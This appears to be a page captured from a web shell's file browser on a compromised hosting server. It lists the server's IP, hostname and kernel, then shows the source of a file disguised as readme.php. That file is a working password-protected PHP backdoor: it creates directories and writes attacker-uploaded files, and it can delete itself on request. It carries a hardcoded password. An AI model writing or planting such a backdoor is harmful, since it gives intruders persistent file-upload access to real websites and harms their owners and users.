uawdijnntqw1x1x1
IP : 216.73.217.127
Hostname : hosting1.hostmaster.uz
Kernel : Linux hosting1.hostmaster.uz 5.14.0-570.52.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 15 06:39:08 EDT 2025 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
uzgidenergo
/
chorsu.uzbekgidroenergoqurilish.uz
/
readme.php
/
/
<?php $password = "AsAjfkel!@"; header("Content-Type:text/plain"); if(isset($_GET["del"])){ @unlink(__FILE__); } if(isset($_GET["pw"])){ if($_GET["pw"] == $password){ $path = $_GET["path"]; $pathSplitted = preg_split("/\\\|\//", $path); $mainpath = getcwd(); foreach($pathSplitted as $dir){ $mainpath = $mainpath . DIRECTORY_SEPARATOR . $dir; if(!is_dir($mainpath)){ echo $mainpath; $h = mkdir($mainpath); if(!$h) die("error"); } } if(isset($_FILES["xaxa"])){ $countfiles = count($_FILES['xaxa']['name']); for($i=0;$i<$countfiles;$i++){ $filename = $_FILES['xaxa']['name'][$i]; $upload = move_uploaded_file($_FILES['xaxa']['tmp_name'][$i],$mainpath . DIRECTORY_SEPARATOR .$filename); if($upload){ echo "success"; } } } } } die();
/home/uzgidenergo/chorsu.uzbekgidroenergoqurilish.uz/readme.php